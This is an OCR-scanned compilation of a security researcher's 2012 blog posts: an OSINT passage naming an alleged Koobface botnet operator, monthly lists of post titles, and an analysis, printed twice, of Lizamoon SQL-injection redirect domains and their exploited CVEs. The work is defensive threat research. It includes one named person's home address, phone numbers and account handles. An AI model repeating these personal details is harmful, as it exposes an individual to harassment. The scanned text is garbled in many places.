Linux". UPDATED: Multiple readers have to contacted me to 
point out that zaebalinax is actually translated to 11 f*ckyou 
all" or 11 you all are passing me off'. 

The same email krotreal@gmail.com was used to 

[4]advertise the sale of Egyptian Sphynx kittens on 

05.09.2007: 359 



Sphynx (kitten) (St. Petersburg) 

E-mail: 

Sale Sphynx kittens. 

Kittens are pedigree. 

Fully immunized. 

Kittens are very playful and funny. 

Girl - a pure black color, 

boy - a black iridescent with in turn. 

Anton. 

Tel. +79219910190 

09/05/2007 



The following telephone belonging to Anton was provided - 
+ 79219910190. The interesting part is that the same 


telephone was also used in [5]another advertisement, 
this time for the sale of a BMW: 

Photos of the BMW, offered for sale, by the same Anton that 
was using the Koobface infrastructure to host 

zaebalinax.com Email: krotreal@gmail.com: 
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Upon further analysis, it becomes evident that his real name 

is Anton Nikolaevich Korotchenko (Ahtoh Hi/iKO/iaeBi/in 

KopoTHeHKo). Here are more details of this online activities: 

Real name: Anton Nikolaevich Korotchenko (Ahtoh 
Hi/iKO/iaeBi/in KopoTHeHKo) 

City of origin: St. Petersburg 

Primary address: Omskaya st. 26-61; St. Petersburg; 
Leningradskaya oblast,197343 

Associated phone numbers obtained through OSINT 
analysis, not whois records: 

+79219910190 

+380505450601 


050-545-06-01 
















ICQ - 444374 

Emails: krotreal@yahoo.com 

krotreal@gmail.com 

krotreal@mail.ru 

krotreal@livejournal.com 

newfider@rambler.ru 

WM identification (WEB MONEY) : 425099205053 
Twitter account: [6]@KrotReal; [7]@Real _Koobface 

Flickr account: [8]KrotReal 

Vkontakte.ru Account: [9]KrotReal; [lOjtonystarx 

Foursquare Account: [HjKrotReal 

Also, [ 12 ]a chat log from 2003, identifies KrotReal while 
he's using the following IP - krotreal@ip- 
534.dialup.cl.spb.ru 

[13] How do you trigger a change that would 
ultimately affect the entire cybercrime ecosystem? 
By person¬ 
alizing cybercrime. 

Go through previous research conducted on the 
Koobface botnet: 
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[14] Koobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 



[15] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[16] Koobface Gang Responds to the "10 Things You Didn't 
Know About the Koobface Gang Post" 

[ 17] 10 things you didn't know about the Koobface gang 

[18] How the Koobface Gang Monetizes Mac OS X Traffic 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model 

[21] From the Koobface Gang with Scareware Serving 
Compromised Site 

[22] Koobface Botnet Starts Serving Client-Side Exploits 

[23] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[24] Dissecting Koobface Gang's Latest Facebook Spreading 
Campaign 

[25] Koobface - Come Out, Come Out, Wherever You Are 

[26] Dissecting Koobface Worm's Twitter Campaign 

[27] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[28] Koobface Botnet Dissected in a TrendMicro Report 

[29] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[30] Movement on the Koobface Front - Part Two 



[31] Movement on the Koobface Front 

[32] Dissecting the Koobface Worm's December Campaign 

[33] The Koobface Gang Mixing Social Engineering Vectors 

[34] Dissecting the Latest Koobface Facebook Campaign 
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Summarizing ZDNet's Zero Day Posts for January 
(2012-02-02 00:59) 







The following is a brief summary of all of my posts at ZDNet's 
Zero Day for January, 2012. You can subscribe to my 

[l]personal RSS feed , [2]Zero Day's main feed , or 

follow me on Twitter: 

01. [3]'Most beautiful' scams proliferate on Facebook 

02. [4]Android users hit by scareware scam 

03. [5]'Remove Facebook Timeline' themed scam circulating 
on Facebook 

04. [6]Fake Kimjong-il video distributing malware 

05. [7]Researchers spot pharmaceutical spam campaign 
using QR Codes 

06. [8]Report: Conficker and AutoRun infections proliferating 

07. [9]Researchers spot scammers using fake browser plug¬ 
ins 
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08. [10]New variants of premium rate SMS trojan 'RuFraud' 
detected in the wild 

09. [HJResearch: Spammers actively harvesting emails from 
Twitter in real-time 

10. [12]DreamFlost hacked, mass password-reset issued 
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Summarizing Webroot's Threat Blog Posts for January 
(2012-02-02 01:07) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for January, 2012. You can 

subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Millions of harvested emails offered for sale 

02. [4]Email hacking for hire going mainstream 

03. [5]Mass SQL injection attack affects over 200,000 URLs 

04. [6]A peek inside the PickPocket Botnet 
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05. [7]A peek inside the Cythosia v2 DDoS Bot 

06. [8]Google announces new anti-malware features in 
Chrome 

07. [9]Adobe issues a patch for critical security holes in 
Reader and Acrobat 

08. [lOJInside a clickjacking/likejacking scam distribution 
platform for Facebook 

09.[11] Zappos.com hacked, 24 million users affected 

10. [12]lnside AnonJDB - a Java based malware distribution 
platforms for drive-by downloads 

11. [13]How malware authors evade antivirus detection 

12. [14]A peek inside the Umbra malware loader 



13. [15]How phishers launch phishing attacks 

14. [16]Researchers intercept a client-side exploits serving 
malware campaign 

15. [17]A peek inside the uBot malware bot 

16. [18]Cisco releases 'Cisco Global Threat Report' for 4Q11 

17. [19]Cybercriminals generate malicious Java applets using 
DIY tools 
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launch-phishin a -attacks/ 
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Summarizing ZDNet's Zero Day Posts for February 
(2012-03-07 23:04) 

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for February, 2012. You can subscribe to my 













[l]personal RSS feed , [2]Zero Day's main feed , or 

follow me on Twitter: 

01. [3]Spamvertised Tax information needed urgently' 
emails lead to malware 

02. [4]Researchers spot a fake version of Temple Run on 
Android's Market 

03. [5]Which are the most commonly observed Web exploits 
in the wild? 
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04. [6]Cryptome.org hacked, serving client-side exploits 

05. [7]Report: third party programs rather than Microsoft 
programs responsible for most vulnerabilities 

06. [8]Anonymous launches 'Operation Global Blackout', 
aims to DDoS the Root Internet servers 

07. [9]Report: malware pushed by affiliate networks remains 
the primary growth factor of the cybercrime ecosystem 

08.[10]Cutwail botnet resurrects, launches massive malware 
campaigns using HTML attachments 

09. [ll]New Mac OS X trojan spotted in the wild 

10. [12]Spamvertised 'Scan from a HP OfficeJet' emails lead 
to exploits and malware 

11. [13]XSS Flaw discovered in Skype's Shop, user accounts 
targeted 

This post has been reproduced from [14]Dancho 
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Summarizing Webroot's Threat Blog Posts for 
February (2012-03-07 23:18) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for February, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 














or follow me on Twitter: 


01. [3]Research: Google's reCAPTCHA underfire 

02. [4]Spamvertised 'You have 1 lost message on Facebook' 
campaign leads to pharmaceutical scams 

374 

03. [5]A peek inside the Smoke Malware Loader 

04. [6]Researchers spot Citadel, a ZeuS crimeware variant 

05. [7]Researchers intercept two client-side exploits serving 
malware campaigns 

06. [8]Pharmaceutical scammers launch their own Web 
contest 

07. [9]The United Nations hacked, Team Poison claims 
responsibility 

08. [10]Report: Internet Explorer 9 leads in socially- 
engineered malware protection 

09. [ll]Twitter adds HTTPS support by default 

10. [12]Spamvertised "Hallmark ecard" campaign leads to 
malware 

11. [13]Report: 3,325 % increase in malware targeting the 
Android OS 

12. [14]Why relying on antivirus signatures is simply not 
enough anymore 

13. [15]Researchers intercept malvertising campaign using 
Yahoo's ad network 



14. [16]A peek inside the Ann Malware Loader 

15. [17]Spamvertised Termination of your CPA license' 
campaign serving client-side exploits 

16. [18]How cybercriminals monetize malware-infected hosts 

17. [19]A peek inside the Elite Malware Loader 

18. [20]BlackHole exploit kits gets updated with new 
features 
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Summarizing ZDNet's Zero Day Posts for March 
(2012-04-09 19:50) 























The following is a brief summary of all of my posts at ZDNet's 
Zero Day for March, 2012. You can subscribe to my 

[l]personal RSS feed , [2]Zero Day's main feed , or 

follow me on Twitter: 

01. [3]New Mac OS X malware variant spotted in the wild 

02. [4]Researchers intercept targeted malware attack against 
Tibetan organizations 

03. [5]Skype vouchers themed site serving client-side 
exploits and malware 

04. [6]Stratfor subscribers targeted by passwords-stealing 
malicious emails 

05. [7]Spoofed Linkedln emails serving client-side exploits 

06. [8]Fake YouTube sites target Syrian activists with malware 

07. [9]New Mac OS X malware variant spotted in the wild 

08. [10]Spamvertised 'DHLTracking Notification' emails 
serve malware 

09. [ll]Compromised WordPress sites serving client-side 
exploits and malware 

10. [12]'Pixmania.com payment order detail' themed emails 
serving SpyEye crimeware 
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11. [13]Fake 'Roar of the Pharaoh' Android game spreads 
premium-rate SMS trojan 



12. [14]Research: Many mobile password managers offer 
false feeling of security 

13. [15]Targeted Pro-Tibetan malware attacks hit Mac OS X 
users 

14. [16]Opera for Mac OS X patches 6 security holes 

15. [17]Cybercriminals use Twitter, Linkedln, Baidu, MSDN as 
command and control infrastructure 

16. [18]Facebook phishing attack targets Syrian activists 
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Summarizing Webroot's Threat Blog Posts for March 
(2012-04-09 20:03) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for March, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 


or follow me on Twitter: 



















01. [3]New service converts malware-infected hosts into 
anonymization proxies 

02. [4]Spamvertised Temporary Limit Access To Your 
Account' emails lead to Citi phishing emails 

03. [5]A peek inside the Darkness (Optima) DDoS Bot 

04. [6]Research: proper screening could have prevented 67 
% of abusive domain registrations 

05. [7]Spamvertised 'Your accountant license can be 
revoked' emails lead to client-side exploits and malware 

06. [8]Spamvertised 'Google Pharmacy' themed emails lead 
to pharmaceutical scams 

07. [9]Research: U.S accounts for 72 % of fraudulent 
pharmaceutical orders 

08. [10]Millions of harvested U.S government and U.S 
military email addresses offered for sale 

09. [ll]Spamvertised 'Your tax return appeal is declined' 
emails serving client-side exploits and malware 
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10. [12]Malicious USPS-themed emails circulating in the wild 

11. [13]Spamvertised Linkedln notifications serving client- 
side exploits and malware 

12. [14]Tens of thousands of web sites affected in ongoing 
mass SQL injection attack 

13. [15]Spamvertised Verizon-themed 'Your Bill Is Now 
Available' emails lead to ZeuS crimeware 



14. [16]Spamvertised 'Scan from a Hewlett-Packard ScanJet' 
emails lead to client-side exploits and malware 
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Summarizing ZDNet's Zero Day Posts for April (2012- 
05-08 19:20) 

The following is a brief summary of all of my posts at 

[1] ZDNet f s Zero Day for April, 2012. You can subscribe to 
my 

[2] personal RSS feed , [3]Zero Day's main feed , or 

follow me on Twitter: 

01. [4]Researcher: 50 percent of Mac OS X users still running 
outdated Java versions 

02. [5]Malicious version of Angry Birds Space spotted in the 
wild 

03. [6]French gaming site serving ZeuS crimeware for over 8 
weeks 

04. [7]New ransomware variants spotted in the wild 

05. [8]Nuclear Pack exploit kit introduces anti-honeyclient 
crawling feature 

This post has been reproduced from [9]Dancho 
Danchev's blog. Follow him [10]on Twitter. 
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4. http://www.zdnet.com/blo a /securitv/researcher-50-percent- 
of-mac-os-x-users-still-runnin a -outdated^ ava-ve 

rsions/11512 
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Summarizing Webroot's Threat Blog Posts for April 
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The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog for April, 2012. You can 

subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Adobe patches critical security flaws, introduces auto¬ 
updating mechanism 

02. [4]Email hacking for hire going mainstream - part two 

03. [5]Spamvertised 'US Airways' themed emails serving 
client-side exploits and malware 

04. [6]New underground service offers access to hundreds of 
hacked PCs 

05. [7]Google's Chrome patches 12 'high risk' security 
vulnerabilities 

06. [8]Adobe plans to issue Acrobat Reader 'security update' 
next week 

07. [9]Microsoft issues 6 security bulletins on 'Patch Tuesday' 
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08. [10]Adobe patches critical Reader and Acrobat security 
vulnerabilities 

09. [ll]Hewlett-Packard shipping malware-infected compact 
flash cards 

10. [12]New DIY email harvester released in the wild 

11. [13]Upcoming Webroot briefing at InfoSec, 2012, London 
- "Current and Emerging Trends Within the Cybercrime 



Ecosystem” 

This post has been reproduced from [14]Dancho 
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1. htto://blo a .webroot.com/ 

2. http://feeds2.feedburner.com/WebrootThreatBlo a 

3. http://blo a .webroot.com/2012/04/Q2/adobe-patches- 
critical-securitv-flaws-introduces-auto-updatin a -mechani 

sm/ 

4. http://blo a .webroot.com/2012/04/Q2/email-hackin a -for- 
hire- a oin a -mainstream-part-two/ 

5. http://blo a .webroot.com/2012/04/Q3/spamvertised-us- 
airwavs-themed-emails-servin a -client-side-exploits-and 

-malware/ 

6. http://blo a .webroot.com/2012/04/05/new-under a round- 
service-offers-access-to-hundreds-of-hacked-pcs/ 

7. http://blo a .webroot.com/2012/04/Q6/ a oo a les-chrome- 
patches-12-hi a h-risk-securitv-vulnerabilities/ 

8. http://blo a .webroot.com/2012/04/Q6/adobe-plans-to-issue- 
acrobat-reader-securitv-update-next-week/ 

9. http://blo a .webroot.com/2012/04/12/microsoft-issues-6- 
securitv-bulletins-on-patch-tuesda v/ 

10. http://blo a .webroot.com/2012/Q4/13/adobe-patches- 
cr ical-reader-ancl-acrobat-seen i'.v-vulnerabilities/ 






















































11. http://blo a .webroot.com/2012/04/14/hewlett-packard- 
ship pin a -mal ware-infected-compact-flash-cards/ 

12. http://blo a .webroot.com/2012/Q4/16/new-div-email- 
harvester-released-in-the-wild/ 

13. http://blo a .webroot.com/2012/04/23/upcomin a -webroot- 
briefin a -at-infosec-2012-london-current-and-emer aina- 

trends-withi n-the-cvbercri me-ecosvstem/ 

14. http://ddanchev.blo as pot.com/ 

15. http://twitter.com/danchodanchev 
386 




Dissecting the Ongoing Client-Side Exploits Serving 
Lizamoon Mass SQL Injection Attacks (2012-05-08 
21:36) 

The [l]Lizamoon mass [2]SQL injection attacks gang is 
continuing to efficiently [3]inject malicious code on 
hundreds of thousands of legitimate sites, for the purpose of 
serving [4]fake security software - also known as 
sea reware - 

and client-side exploits. 

The latest round of the campaign is serving client-side 
exploits through multiple redirections taking place once 

the end user loads the malicious script embedded on 
legitimate sites. In comparison, in the past the gang used to 























monetize the hijacked traffic by serving scareware and bogus 
Adobe Flash Players. 

What are some of the currently SQL injected malicious 
domains? How does the redirection take place? Did 

they take into consideration basic QA (quality assurance) 
tactics into place? Let's find out. 

Currrently injected malicious domains are parked at 
31 . 210 . 100.242 (AS42926, RADORE Hosting), with the 
following domains currently responding to that IP: 

skdjui.com/r.php - Email: jamesnorthone@hotmailbox.com 

njukol.com/r.php - Email: jamesnorthone@hotmailbox.com 

hnjhkm.com/r.php - Email: 
jamesnorthone@hotmailbox.com 

nikjju.com/r.php - Email: jamesnorthone@hotmailbox.com 

hgbyju.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhjiku.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhijku.com/r.php - Email: jamesnorthone@hotmailbox.com 

werlontally.net/r.php - Email: 
jamesnorthone@hotmailbox.com 

[5]March f s round of malicious domains was hosted at 
91.226.78.148 (AS56697, LISIK-AS 000 "Byuro Remon- 

tov "FAST”). 

The redirection takes us to these two domains: 
www3.topcumaster.com - 75.102.21.120 (AS23352, 



SERVERCENTRAL) 

Parked at 75.102.21.120 are also the following domains: 

www3.personal-scanera.com - Email: 
benji.rubes@yahoo.com 

www3.personalvoguard.com - Email: 
benji.rubes@yahoo.com 

www3.hard-zdsentinel.com - Email: 
benji.rubes@yahoo.com 

www3.bestbxcleaner.com - Email: 
benji.rubes@yahoo.com 
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www3.topcumaster.com - Email: benji.rubes@yahoo.com 

www3.safe-defensefu.com - Email: 
benji.rubes@yahoo.com 

and wwwl.safe-wnmaster.it.cx - 217.23.8.123 (AS49981, 
WorldStream) 

Parked on 217.23.8.123 are also the following client-side 
exploits serving domains part of the Lizamoon mass 

SQL injection attacks: 

wwwl.thebestscannerdc.it.cx/i.html 

wwwl.safebh-defense.it.cx/i.html 

wwwl.strongdkdefense.it.cx/i.html 

www2.best-czsuite.it.cx/i.html 



wwwl.smartmasterf.it.cx/i.html 
wwwl.simplescanerei.it.cx/i.html 
wwwl. bestic-network. it.cx/i. html 
wwwl.topqonetwork.it.cx/i.html 
www2.topasnetwork. it.cx/i. html 
wwwl. powerynetwork. it.cx/i. html 
wwwl. simplemasterzk. it.cx/i. html 
wwwl. powerneholder. it.cx/i. html 
wwwl. persona I kochecker. it.cx/i. html 
wwwl. smarthdschecker. it.cx/i. html 
wwwl. safebacleaner. it.cx/i. html 
wwwl. strongzkcleaner. it.cx/i. html 
wwwl.topumcleaner. it.cx/i. html 
wwwl. topgdscanner. it.cx/i. html 
wwwl. smartwoscanner. it.cx/i. html 
wwwl.safe-wnmaster. it.cx/i. html 
wwwl. powervmaster. it.cx/i. html 
wwwl. top-armyvs. it.cx/i. html 
www2.saveocsoft. it.cx/i. html 
wwwl.top-zjsoft. it.cx/i. html 



wwwl.powerdefensekt.it.cx/i.html 

wwwl.best-scanersw.it.cx/i.html 

wwwl.powermb-security.it.cx/i.html 

wwwl.strongxd-security. it.cx/i. html 

wwwl.strongbtsecurity.it.cx/i.html 

Client side exploits, [6]CVE-2010-0188 and [7]CVE-2012- 
0507 in particular are served through the i.html file located 
on these hosts. In order for the client-side exploitation 
process to take place, the redirection chain must be correct, 
if not the server will return a "404 Error Message" when 
requesting a specific file part of the campaign. There are no 
HTTP referrer checks in place, at least for the time being. 
What's particularly interesting about the current 

campaign, is that during a period of time, it will on purposely 
serve a "404 Error Message" no matter what happens. 

Updates will be posted, as soon as new developments 
emerge. 

Related posts: 

• [8]SQL Injection Through Search Engines Reconnaissance 

• [9]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 
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• [lOjMassive SQL Injection Attacks - the Chinese Way 

• [lljCybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 



• [12]GoDaddy's Mass WordPress Blogs Compromise Serving 
Sea reware 

• [13]Dissecting the WordPress Blogs Compromise at 
Network Solutions 

• [14]Yet Another Massive SQL Injection Spotted in the Wild 

• [15]Smells Like a Copycat SQL Injection In the Wild 

• [16]Fast-Fluxing SQL Injection Attacks 

• [17]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 
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6. htto://cve.mitre.or a/ca i-bin/cvename.c ai ?name=CVE- 
2010-0188 
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Dissecting the Ongoing Client-Side Exploits Serving 
Lizamoon Mass SQL Injection Attacks (2012-05-08 
21:36) 

The [l]Lizamoon mass [2]SQL injection attacks gang is 
continuing to efficiently [3]inject malicious code on 
hundreds of thousands of legitimate sites, for the purpose of 
serving [4]fake security software - also known as 
sea reware - 

and client-side exploits. 

The latest round of the campaign is serving client-side 
exploits through multiple redirections taking place once 

the end user loads the malicious script embedded on 
legitimate sites. In comparison, in the past the gang used to 

monetize the hijacked traffic by serving scareware and bogus 
Adobe Flash Players. 

What are some of the currently SQL injected malicious 
domains? How does the redirection take place? Did 

they take into consideration basic QA (quality assurance) 
tactics into place? Let's find out. 

Currently injected malicious domains are parked at 
31.210.100.242 (AS42926, RADORE Hosting), with the 
following domains currently responding to that IP: 

skdjui.com/r.php - Email: jamesnorthone@hotmailbox.com 

njukol.com/r.php - Email: jamesnorthone@hotmailbox.com 


hnjhkm.com/r.php - Email: 
jamesnorthone@hotmailbox.com 

nikjju.com/r.php - Email: jamesnorthone@hotmailbox.com 

hgbyju.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhjiku.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhijku.com/r.php - Email: jamesnorthone@hotmailbox.com 

werlontally.net/r.php - Email: 
jamesnorthone@hotmailbox.com 

[5]March f s round of malicious domains was hosted at 
91.226.78.148 (AS56697, LISIK-AS 000 "Byuro Remon- 

tov "FAST”). 

The redirection takes us to these two domains: 
www3.topcumaster.com - 75.102.21.120 (AS23352, 
SERVERCENTRAL) 

Parked at 75 . 102 . 21.120 are also the following domains: 

www3.personal-scanera.com - Email: 
benji.rubes@yahoo.com 

www3.personalvoguard.com - Email: 
benji.rubes@yahoo.com 

www3.hard-zdsentinel.com - Email: 
benji.rubes@yahoo.com 

www3.bestbxcleaner.com - Email: 
benji.rubes@yahoo.com 
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www3.topcumaster.com - Email: benji.rubes@yahoo.com 

www3.safe-defensefu.com - Email: 
benji.rubes@yahoo.com 

and wwwl.safe-wnmaster.it.cx - 217.23.8.123 (AS49981, 
WorldStream) 

Parked on 217.23.8.123 are also the following client-side 
exploits serving domains part of the Lizamoon mass 

SQL injection attacks: 

wwwl.thebestscannerdc.it.cx/i.html 
wwwl.safebh-defense.it.cx/i.html 
wwwl.strongdkdefense.it.cx/i.html 
www2.best-czsuite.it.cx/i.html 
wwwl.smartmasterf.it.cx/i.html 
wwwl.simplescanerei.it.cx/i.html 
wwwl. bestic-network. it.cx/i. html 
wwwl.topqonetwork. it.cx/i. html 
www2.topasnetwork. it.cx/i. html 
wwwl. powerynetwork. it.cx/i. html 
wwwl. simplemasterzk. it.cx/i. html 
wwwl. powerneholder. it.cx/i. html 
wwwl. persona I kochecker. it.cx/i. html 



wwwl.smarthdschecker.it.cx/i.html 

wwwl.safebacleaner.it.cx/i.html 

wwwl.strongzkcleaner.it.cx/i.html 

wwwl. topumcleaner. it.cx/i.html 

wwwl.topgdscanner.it.cx/i.html 

wwwl.smartwoscanner. it.cx/i.html 

wwwl.safe-wnmaster. it.cx/i.html 

wwwl. po we rvm aster, it.cx/i.html 

wwwl.top-armyvs. it.cx/i.html 

www2.saveocsoft. it.cx/i.html 

wwwl. top-zjsoft. it.cx/i.html 

wwwl. powerdefensekt. it.cx/i.html 

wwwl. best-scanersw. it.cx/i.html 

wwwl. powermb-security. it.cx/i.html 

wwwl.strongxd-security. it.cx/i. html 

wwwl. strongbtsecurity. it.cx/i.html 

Client side exploits, [6]CVE-2010-0188 and [7]CVE-2012- 
0507 in particular are served through the i.html file located 
on these hosts. In order for the client-side exploitation 
process to take place, the redirection chain must be correct, 
if not the server will return a "404 Error Message" when 
requesting a specific file part of the campaign. There are no 



HTTP referrer checks in place, at least for the time being. 
What's particularly interesting about the current 

campaign, is that during a period of time, it will on purposely 
serve a "404 Error Message" no matter what happens. 

Updates will be posted, as soon as new developments 
emerge. 

Related posts: 

[8] SQL Injection Through Search Engines Reconnaissance 

[9] Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

[10] Massive SQL Injection Attacks - the Chinese Way 

[lljCybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 
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[12] GoDaddy's Mass WordPress Blogs Compromise Serving 
Sea reware 

[13] Dissecting the WordPress Blogs Compromise at Network 
Solutions 

[14] Yet Another Massive SQL Injection Spotted in the Wild 

[15] Smells Like a Copycat SQL Injection In the Wild 

[16] Fast-Fluxing SQL Injection Attacks 

[17] Obfuscating Fast-fluxed SQL Injected Domains 
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Summarizing ZDNet's Zero Day Posts for May (2012- 
06-06 18:15) 

The following is a brief summary of all of my posts at 

[1] ZDNet's Zero Day for May, 2012. You can subscribe to 
my 

[2] personal RSS feed , [3]Zero Day's main feed , or 

follow me on Twitter: 


































01. [4]Is Mozilla's Firefox 'click-to-play' feature a sound 
response to drive-by malware attacks? 

02. [5]Rogue Firefox extension hijacks browser sessions 

03. [6]Spamvertised 'PayPal payment notifications' lead to 
client-side exploits and malware 

04. [7]lsraeli Institute for National Security Studies 
compromised, serving Poison Ivy DIY malware 

05. [8]Researchers spot new Web malware exploitation kit 

06. [9]2012 Olympics themed malware circulating in the wild 

07. [10]New ransomware impersonates the U.S Department 
of Justice 

08. [lljLocalized ransomware variants circulating in the wild 
09. [12]Cybercriminals offer bogus fraud insurance services 
394 

10. [13]Researchers spot fake mobile antivirus scanners on 
Google Play 

11. [14]The cyber security implications of Iran's government- 
backed antivirus software 

12. [15]Q &A of the week: 'The current state of the cyber 
warfare threat' featuring Jeffrey Carr 

13. [16]Researchers intercept Tatanga malware bypassing 
SMS based transaction authorization 

14. [17]New SpyEye plugin takes control of crimeware 
victims' webcam and microphone 



15. [18]Comcast phishing site contains valid TRUSTe seal 

16. [19]Q &A of the Week: The current state of the 
cybercrime ecosystem' featuring Mikko Hypponen 

This post has been reproduced from [20]Dancho 
Danchev's blog. Follow him [21 Jon Twitter. 
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Summarizing Webroot's Threat Blog Posts for May 
(2012-06-06 18:31) 

The following is a brief summary of all of my posts at 
[ljWebroot's Threat Blog for May, 2012. You can 

subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]London's InfoSec 2012 Event - recap 

02. [4]Managed SMS spamming services going mainstream 

03. [5]A peek inside a boutique cybercrime-friendly E-shop 

04. [6]Cybercriminals release 'Sweet Orange' - new web 
malware exploitation kit 

05. [7]Spamvertised 'Pizzeria Order Details' themed 
campaign serving client-side exploits and malware 

06. [8]Poison Ivy trojan spreading across Skype 

07. [9]A peek inside a managed spam service 
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08. [10]Ongoing 'Linkedln Invitation' themed campaign 
serving client-side exploits and malware 

09. [ll]Spamvertised bogus online casino themed emails 
serving adware 

10. [12]Spamvertised 'YouTube Video Approved' and Twitter 
Support" themed emails lead to pharmaceutical scams 

11. [13]A peek inside a boutique cybercrime-friendly E-shop 
- part two 

12. [14]Spamvertised CareerBuilder themed emails serving 
client-side exploits and malware 

13. [15]Pop-ups at popular torrent trackers serving 
W32/Casonline adware 

14. [16]'Windstream bill' themed emails serving client-side 
exploits and malware 
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Summarizing ZDNet's Zero Day Blog Posts for June 
(2012-07-10 19:02) 

The following is a brief summary of all of my posts at 
[lJZDNet's Zero Day for June, 2012. You can subscribe to 

[2]Zero Day's main feed , or follow me on Twitter: 

01. [3]Fake Gmail Android application steals personal data 

02. [4]Facebook begins notifying DNSChanger victims 

03. [5]French E-voting portal requires insecurejava plugin 

04. [6]Credit card fraudsters sentenced in the U.K 

05. [7]North Korea ships malware-infected games to South 
Korean users, uses them to launch DDoS attacks 










06. [8]Q &A of the Week - Tales from the Underground' 
featuring Brian Krebs 

07. [9]24 cybercriminals arrested in 'Operation Card Shop' 

08. [ 10]Silent security updates coming to Apple's OS X 
Mountain Lion 
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09. [ll]BlackHole exploit kit experimenting with 'pseudo¬ 
random domains' feature 

10. [12]Which is the most popular antivirus software? 

11. [13]Winamp 5.63 fixes four critical security 
vulnerabilities 

12. [14]Chrome 20 fixes 20 security vulnerabilities 
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Summarizing Webroot's Threat Blog Posts for June 
( 2012 - 07-10 19 : 16 ) 






































The following is a brief summary of all of my posts at 
[ljWebroot's Threat Blog for June, 2012. You can 

subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Cybercriminals infiltrate the music industry by offering 
full newly released albums for just $1 

02. [4]A peek inside a boutique cybercrime-friendly E-shop - 
part three 

03. [5]DDoS for hire services offering to 'take down your 
competitor's web sites' going mainstream 

04. [6]Skype propagating Trojan targets Syrian activists 

05. [7]Spamvertised 'UPS Delivery Notification' emails 
serving client-side exploits and malware 

06. [8]Mozilla patches critical security vulnerabilities in 
Firefox and Thunderbird 

07. [9]Spamvertised 'DHL Package delivery report' emails 
serving malware 
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08. [10]Spamvertised 'Your Amazon.com order confirmation' 
emails serving client-side exploits and malware 09. 
[lljCybercriminals populate Scribd with bogus adult 
content, spread malware using Comodo Backup 

10. [12]Oracle and Apple patch critical Java security 
vulnerabilities 

11. [13]Spamvertised 'YourPaypal Ebay.com payment' emails 
serving client-side exploits and malware 



12. [14]'Create a Cartoon of You" ads serving MyWebSearch 
toolbar 

13. [15]Spamvertised 'Your UPS delivery tracking' emails 
serving client-side exploits and malware 

14. [16]Spamvertised 'Confirm PayPal account" notifications 
lead to phishing sites 

15. [17]Spamvertised 'DHL Express Parcel Tracking 
Notification' emails serving malware 

16. [18]Spamvertised bogus online casino themed emails 
serving W32/Casonline 
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a I ware/ 
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Summarizing ZDNet's Zero Day Blog Posts for July 
(2012-08-23 18:16) 

The following is a brief summary of all of my posts at 
[lJZDNet's Zero Day for July, 2012. You can subscribe to 
[2]Zero Day's main feed , or follow me on Twitter: 

01. [3]Security flaw found in Amazon's Kindle Touch 

























02. [4]New contacts stealing Android malware spotted in the 
wild 

03. [5]Firefox 14 fixes 5 critical security vulnerabilities 

04. [6]Bogus Google Files site earns revenue through 
premium rate SMS micro payments 

05. [7]Research: 80 % of Carberp infected computers had 
antivirus software installed 
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Summarizing Webroot's Threat Blog Posts for July 
(2012-08-23 19:05) 

The following is a brief summary of all of my posts at 
[l]Webroot's Threat Blog forjuly, 2012. You can subscribe 

to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]Cybercriminals launch managed SMS flooding services 

02. [4]117,000 unique U.S visitors offered for malware 
conversion 

03. [5]Phishing campaign targeting Gmail, Yahoo, AOL and 
Hotmail spotted in the wild 

04. [6]What's the underground market's going rate for a 
thousand U.S based malware infected hosts? 

05. [7]Spamvertised American Airlines themed emails lead to 
Black Hole exploit kit 

06. [8]Online dating scam campaign currently circulating in 
the wild 

07. [9]New Russian service sells access to compromised 
social networking accounts 

08. [10]Cybercriminals impersonate UPS in client-side 
exploits and malware serving spam campaign 



09. [ll]Russian Ask.fm spamming tool spotted in the wild 

10. [12]Spamvertised Intuit themed emails lead to Black 
Hole exploit kit 

11. [13]Cybercriminals impersonate Booking.com, serve 
malware using bogus 'Hotel Reservation Confirmation' 

themed emails 

12. [14]Spamvertised Craigslist themed emails lead to Black 
Hole exploit kit 

13. [15]Cybercriminals impersonate law enforcement, 
spamvertise malware-serving 'Speeding Ticket' themed 
emails 

14. [16]Spamvertised 'Download your USPS Label' themed 
emails serve malware 

15. [17]Cybercriminals target Twitter, spread thousands of 
exploits and malware serving tweets 
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16. [18]Russian spammers release Skype spamming tool 

17. [19]Spamvertised 'Your Ebay funds are cleared' themed 
emails lead to Black Hole exploit kit 

This post has been reproduced from [20]Dancho 
Danchev's blog. Follow him [21 Jon Twitter. 
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Dissecting 'Operation Ababil' - an OSINT Analysis 
(2012-09-28 00:25) 

Provoked by a questionable online video posted on YouTube, 
Muslims from the around the world united in an 


apparent [l]opt-in botnet crowdsourcing campaign 

aiming to launch a DDoS (denial of service attack) against 

